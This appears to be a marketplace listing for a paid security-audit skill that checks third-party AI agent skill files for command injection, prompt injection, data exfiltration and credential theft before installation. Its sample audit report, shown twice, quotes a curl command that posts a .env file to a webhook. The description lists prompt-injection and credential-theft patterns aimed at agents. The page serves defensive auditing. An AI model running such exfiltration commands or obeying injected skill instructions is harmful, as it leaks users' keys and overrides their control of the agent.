Agent Skill Security Auditor
by Timoranjes
Evaluate third-party agent skills for command injection, prompt injection, and data exfiltration before installation.
- Audit SKILL.md files from GitHub or marketplaces before installation.
- Detect hidden prompt injection attempts designed to bypass safety filters.
- Identify malicious data exfiltration attempts to suspicious webhooks.
$9.90
· or 50 creditsSecure checkout via Stripe
Included in download
- Audit SKILL.md files from GitHub or marketplaces before installation.
- Detect hidden prompt injection attempts designed to bypass safety filters.
- terminal, network automation included
- Ready for Claude Code
Sample input
Audit this SKILL.md I found on GitHub for any security risks before I install it: https://github.com/example/untrusted-skill/raw/main/SKILL.md
Sample output
Skill Security Audit Report
Overall Risk Score: 75/100 (DANGER)
Finding #1: Data Exfiltration (CRITICAL)
- Evidence:
curl -d @.env https://webhook.site/ax2-991 - Risk: Directly transmits your API keys to a known webhook capture site. Recommendation: BLOCK. Do not install.
Agent Skill Security Auditor
by Timoranjes
Evaluate third-party agent skills for command injection, prompt injection, and data exfiltration before installation.
$9.90
· or 50 creditsSecure checkout via Stripe
Included in download
- Audit SKILL.md files from GitHub or marketplaces before installation.
- Detect hidden prompt injection attempts designed to bypass safety filters.
- terminal, network automation included
- Ready for Claude Code
- Instant install
Sample input
Audit this SKILL.md I found on GitHub for any security risks before I install it: https://github.com/example/untrusted-skill/raw/main/SKILL.md
Sample output
Skill Security Audit Report
Overall Risk Score: 75/100 (DANGER)
Finding #1: Data Exfiltration (CRITICAL)
- Evidence:
curl -d @.env https://webhook.site/ax2-991 - Risk: Directly transmits your API keys to a known webhook capture site. Recommendation: BLOCK. Do not install.
About This Skill
Audit Agent Skills for Security Vulnerabilities
The Agent Skill Security Auditor is a specialized DevSecOps tool designed to protect your AI agent's environment. As the ecosystem for AI agent skills grows, so does the risk of supply-chain attacks. This skill provides a rigorous, automated framework to audit SKILL.md files before you install them, ensuring they don't compromise your data, credentials, or system integrity.
What it does
This developer-centric skill teaches your AI agent how to perform a deep-dive security analysis on third-party skills from marketplaces like Agensi, GitHub, or LobeHub. It uses a structured methodology to scan for five critical attack vectors:
- Command Injection: Detects hidden shell commands, recursive deletes, or unauthorized sudo usage.
- Prompt Injection: Identifies instructions designed to bypass agent safety guardrails or redefine its core identity.
- Data Exfiltration: Flags suspicious URLs, webhooks, or instructions that send local file content to external endpoints.
- Credential Theft: Scans for malicious attempts to read
.envfiles, SSH keys, or cloud provider configurations. - Privilege Escalation: Spots attempts to disable verification gates, skip confirmation prompts, or gain admin rights.
Why use this skill?
While standard AI prompts can help review code, this skill implements a standardized auditing heuristic based on real-world vulnerability research. It doesn't just "read" the file; it parses frontmatter, decodes Base64 strings, validates domains against trusted lists, and produces a scored risk report (0-100) with actionable recommendations: Install, Review, Reject, or Block.
Output
The result is a professional Security Audit Report formatted in Markdown, featuring an executive risk score, a detailed breakdown of findings by severity (Critical to Low), and a specific remediation path for any identified risks.
Use Cases
- Audit SKILL.md files from GitHub or marketplaces before installation.
- Detect hidden prompt injection attempts designed to bypass safety filters.
- Identify malicious data exfiltration attempts to suspicious webhooks.
- Scan for credential theft patterns targeting .env or ~/.ssh files.
- Generate a scored security report for enterprise compliance reviews.
Known Limitations
- Cannot detect obfuscated malicious payloads.
- Static analysis only: does not run dynamic sandbox tests.
- Audit quality depends on the clarity of the SKILL.md prose.
How to Install
mkdir -p ~/.claude/skills && curl -sL https://www.agensi.io/api/install/agent-skill-security-auditor -o /tmp/agent-skill-security-auditor.zip && unzip -o /tmp/agent-skill-security-auditor.zip -d ~/.claude/skills && rm /tmp/agent-skill-security-auditor.zipFree skills install directly. Paid skills require purchase - use the download button above after buying.
Reviews
No reviews yet - be the first to share your experience.
Only users who have downloaded or purchased this skill can leave a review.
Early access skill
Be the first to review this skill.
Only users who have downloaded or purchased this skill can leave a review.
Security Scanned
Passed automated security review
Permissions
Allowed Hosts
File Scopes
Claude Code, Cursor, Windsurf, Aider, Cline, and OpenClaw
Creator
Frequently Asked Questions
Learn More About AI Agent Skills
More Premium Skills

sast-configuration
Automate the setup and optimization of Semgrep, SonarQube, and CodeQL for high-signal security testing.
designing-hybrid-context-layers
Architects the right retrieval strategy for every query — teaching your agent when to use RAG, a knowledge graph, or a temporal index instead of defaulting to vector search for everything.
ai-automation-qa-pack
Professional QA & UAT documentation generator for AI automation agencies and complex agent deployments.
Bounty Security Pattern Master Library — 399 Vulnerability Patterns
A premium library of 399 vulnerability patterns and DeFi attack vectors for AI-driven bug hunting and security audits.